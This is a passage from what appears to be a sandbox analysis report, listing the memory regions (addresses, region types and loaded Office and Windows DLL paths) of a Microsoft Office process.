office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll") Region: id = 283 start_va = 0x7fef4630000 end_va = 0x7fef4632fff entry_point = 0x7fef4630000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 284 start_va = 0x7fef4640000 end_va = 0x7fef4731fff entry_point = 0x7fef4640000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll") Region: id = 285 start_va = 0x7fef4740000 end_va = 0x7fef4746fff entry_point = 0x7fef4740000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 286 start_va = 0x7fef4750000 end_va = 0x7fef4878fff entry_point = 0x7fef4750000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 287 start_va = 0x7fef4880000 end_va = 0x7fef48f9fff entry_point = 0x7fef4880000 region_type = mapped_file name = "appvisvstream64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll") Region: id = 288 start_va = 0x7fef4900000 end_va = 0x7fef4b35fff entry_point = 0x7fef4900000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 289 start_va = 0x7fef6a00000 end_va = 0x7fef6bb8fff entry_point = 0x7fef6a00000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 290 start_va = 0x7fef6bc0000 end_va = 0x7fef6bc2fff entry_point = 0x7fef6bc0000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 291 start_va = 0x7fef6bd0000 end_va = 0x7fef6bd2fff entry_point = 0x7fef6bd0000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 292 start_va = 0x7fef6be0000 end_va = 0x7fef6be2fff entry_point = 0x7fef6be0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 293 start_va = 0x7fef6bf0000 end_va = 0x7fef6bf2fff entry_point = 0x7fef6bf0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 294 start_va = 0x7fef6c00000 end_va = 0x7fef6c04fff entry_point = 0x7fef6c00000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 295 start_va = 0x7fef6c10000 end_va = 0x7fef6c14fff entry_point = 0x7fef6c10000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 296 start_va = 0x7fef6c20000 end_va = 0x7fef6c22fff entry_point = 0x7fef6c20000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 297 start_va = 0x7fef6c30000 end_va = 0x7fef6ccdfff entry_point = 0x7fef6c30000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 298 start_va = 0x7fef6cd0000 end_va = 0x7fef6cd3fff entry_point = 0x7fef6cd0000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 299 start_va = 0x7fef6ce0000 end_va = 0x7fef6ce3fff entry_point = 0x7fef6ce0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 300 start_va = 0x7fef6cf0000 end_va = 0x7fef6cf2fff entry_point = 0x7fef6cf0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 301 start_va = 0x7fef6d00000 end_va = 0x7fef6d03fff entry_point = 0x7fef6d00000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 302 start_va = 0x7fef6e60000 end_va = 0x7fef6e63fff entry_point = 0x7fef6e60000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 303 start_va = 0x7fef6e70000 end_va = 0x7fef6e86fff entry_point = 0x7fef6e70000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 304 start_va = 0x7fef77a0000 end_va = 0x7fef7813fff entry_point = 0x7fef77a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 305 start_va = 0x7fef7a20000 end_va = 0x7fef7a74fff entry_point = 0x7fef7a20000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 306 start_va = 0x7fef7a80000 end_va = 0x7fef7ab3fff entry_point = 0x7fef7a80000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 307 start_va = 0x7fef8c70000 end_va = 0x7fef8d16fff entry_point = 0x7fef8c70000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 308 start_va = 0x7fef8d20000 end_va = 0x7fef8e01fff entry_point = 0x7fef8d20000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 309 start_va = 0x7fef8e10000 end_va = 0x7fef9125fff entry_point = 0x7fef8e10000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 310 start_va = 0x7fefae10000 end_va = 0x7fefae1afff entry_point = 0x7fefae10000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 311 start_va = 0x7fefaea0000 end_va = 0x7fefaeb4fff entry_point = 0x7fefaea0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 312 start_va = 0x7fefb470000 end_va = 0x7fefb480fff entry_point = 0x7fefb470000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 313 start_va = 0x7fefb4a0000 end_va = 0x7fefb5c9fff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 314 start_va = 0x7fefb5d0000 end_va = 0x7fefb604fff entry_point = 0x7fefb5d0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 315 start_va = 0x7fefb610000 end_va = 0x7fefb627fff entry_point = 0x7fefb610000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 316 start_va = 0x7fefb820000 end_va = 0x7fefba34fff entry_point = 0x7fefb820000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 317 start_va = 0x7fefba40000 end_va = 0x7fefba95fff entry_point = 0x7fefba40000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 318 start_va = 0x7fefbaa0000 end_va = 0x7fefbbcbfff entry_point = 0x7fefbaa0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 319 start_va = 0x7fefbbf0000 end_va = 0x7fefbde3fff entry_point = 0x7fefbbf0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 320 start_va = 0x7fefc0e0000 end_va = 0x7fefc10cfff entry_point = 0x7fefc0e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 321 start_va = 0x7fefc2e0000 end_va = 0x7fefc2ebfff entry_point = 0x7fefc2e0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 322 start_va = 0x7fefc4c0000 end_va = 0x7fefc4ddfff entry_point = 0x7fefc4c0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 323 start_va = 0x7fefc710000 end_va = 0x7fefc756fff entry_point = 0x7fefc710000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 324 start_va = 0x7fefca10000 end_va = 0x7fefca26fff entry_point = 0x7fefca10000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 325 start_va = 0x7fefcfb0000 end_va = 0x7fefcfbafff entry_point = 0x7fefcfb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 326 start_va = 0x7fefcfe0000 end_va = 0x7fefd004fff entry_point = 0x7fefcfe0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 327 start_va = 0x7fefd010000 end_va = 0x7fefd01efff entry_point = 0x7fefd010000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 328 start_va = 0x7fefd020000 end_va = 0x7fefd0b0fff entry_point = 0x7fefd020000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 329 start_va = 0x7fefd0c0000 end_va = 0x7fefd0fcfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 330 start_va = 0x7fefd100000 end_va = 0x7fefd113fff entry_point = 0x7fefd100000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 331 start_va = 0x7fefd120000 end_va = 0x7fefd12efff entry_point = 0x7fefd120000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 332 start_va = 0x7fefd1c0000 end_va = 0x7fefd1cefff entry_point = 0x7fefd1c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 333 start_va = 0x7fefd2a0000 end_va = 0x7fefd2affff entry_point = 0x0 region_type = private name = "private_0x000007fefd2a0000" filename = "" Region: id = 334 start_va = 0x7fefd2b0000 end_va = 0x7fefd31afff entry_point = 0x7fefd2b0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 335 start_va = 0x7fefd320000 end_va = 0x7fefd486fff entry_point = 0x7fefd320000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 336 start_va = 0x7fefd490000 end_va = 0x7fefd4a9fff entry_point = 0x7fefd490000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 337 start_va = 0x7fefd4b0000 end_va = 0x7fefd4e9fff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 338 start_va = 0x7fefd4f0000 end_va = 0x7fefd541fff entry_point = 0x7fefd4f0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 339 start_va = 0x7fefd550000 end_va = 0x7fefd618fff entry_point = 0x7fefd550000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 340 start_va = 0x7fefd620000 end_va = 0x7fefd6f6fff entry_point = 0x7fefd620000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 341 start_va = 0x7fefd700000 end_va = 0x7fefd7dafff entry_point = 0x7fefd700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 342 start_va = 0x7fefd980000 end_va = 0x7fefdb56fff entry_point = 0x7fefd980000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 343 start_va = 0x7fefdb60000 end_va = 0x7fefdbacfff entry_point = 0x7fefdb60000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 344 start_va = 0x7fefdbb0000 end_va = 0x7fefdbddfff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 345 start_va = 0x7fefde40000 end_va = 0x7fefe042fff entry_point = 0x7fefde40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 346 start_va = 0x7fefe220000 end_va = 0x7fefe2b8fff entry_point = 0x7fefe220000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 347 start_va = 0x7fefe2c0000 end_va = 0x7fefe2defff entry_point = 0x7fefe2c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 348 start_va = 0x7fefe2e0000 end_va = 0x7fefe3e8fff entry_point = 0x7fefe2e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 349 start_va = 0x7fefe3f0000 end_va = 0x7fefe51cfff entry_point = 0x7fefe3f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 350 start_va = 0x7fefe520000 end_va = 0x7fefe5befff entry_point = 0x7fefe520000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 351 start_va = 0x7fefe5c0000 end_va = 0x7fefe5c7fff entry_point = 0x7fefe5c0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 352 start_va = 0x7fefe5d0000 end_va = 0x7fefe636fff entry_point = 0x7fefe5d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 353 start_va = 0x7fefe640000 end_va = 0x7fefe64dfff entry_point = 0x7fefe640000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 354 start_va = 0x7fefe6d0000 end_va = 0x7fefe740fff entry_point = 0x7fefe6d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 355 start_va = 0x7fefe750000 end_va = 0x7feff4d7fff entry_point = 0x7fefe750000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 356 start_va = 0x7feff4f0000 end_va = 0x7feff4f0fff entry_point = 0x7feff4f0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 357 start_va = 0x7fffff80000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 358 start_va = 0x7fffff90000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 359 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 360 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 361 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 362 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 363 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 364 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 365 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 366 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 367 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 368 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 369 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 370 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 371 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 372 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 373 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 374 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 375 start_va = 0x3c0000 end_va = 0x3c8fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 376 start_va = 0x2430000 end_va = 0x2453fff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 377 start_va = 0x2570000 end_va = 0x2593fff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 378 start_va = 0x2730000 end_va = 0x2738fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 379 start_va = 0x7fef7350000 end_va = 0x7fef73a6fff entry_point = 0x7fef7350000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 380 start_va = 0x90d0000 end_va = 0x91cffff entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 381 start_va = 0x7fef70c0000 end_va = 0x7fef7340fff entry_point = 0x7fef70c0000 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6917.0607\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\onedrive\\17.3.6917.0607\\amd64\\filesyncshell64.dll") Region: id = 382 start_va = 0x7fefd7e0000 end_va = 0x7fefd957fff entry_point = 0x7fefd7e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 383 start_va = 0x7fefdbe0000 end_va = 0x7fefde38fff entry_point = 0x7fefdbe0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 384 start_va = 0x7fefe0f0000 end_va = 0x7fefe219fff entry_point = 0x7fefe0f0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 385 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 386 start_va = 0x2740000 end_va = 0x2741fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002740000" filename = "" Region: id = 387 start_va = 0x92c0000 end_va = 0x93bffff entry_point = 0x0 region_type = private name = "private_0x00000000092c0000" filename = "" Region: id = 388 start_va = 0x93c0000 end_va = 0x9bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000093c0000" filename = "" Region: id = 389 start_va = 0x9d10000 end_va = 0x9e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000009d10000" filename = "" Region: id = 390 start_va = 0x9e60000 end_va = 0x9f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 391 start_va = 0x7fef6e90000 end_va = 0x7fef70a3fff entry_point = 0x7fef6e90000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 392 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 393 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 394 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 395 start_va = 0x2770000 end_va = 0x277efff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 396 start_va = 0x2780000 end_va = 0x2780fff entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 397 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 398 start_va = 0x2ec0000 end_va = 0x2ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 399 start_va = 0x2ed0000 end_va = 0x2ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 400 start_va = 0x2ef0000 end_va = 0x2ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 401 start_va = 0x2f10000 end_va = 0x2f10fff entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 402 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 403 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 404 start_va = 0x2f70000 end_va = 0x2f70fff entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 405 start_va = 0x2f90000 end_va = 0x2f90fff entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 406 start_va = 0x2fb0000 end_va = 0x2fb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 407 start_va = 0x3080000 end_va = 0x3080fff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 408 start_va = 0x31a0000 end_va = 0x3203fff entry_point = 0x31a0000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 409 start_va = 0x3430000 end_va = 0x3430fff entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 410 start_va = 0x9bf0000 end_va = 0x9ceffff entry_point = 0x0 region_type = private name = "private_0x0000000009bf0000" filename = "" Region: id = 411 start_va = 0xa010000 end_va = 0xa10ffff entry_point = 0x0 region_type = private name = "private_0x000000000a010000" filename = "" Region: id = 412 start_va = 0xa110000 end_va = 0xa2c8fff entry_point = 0xa110000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft 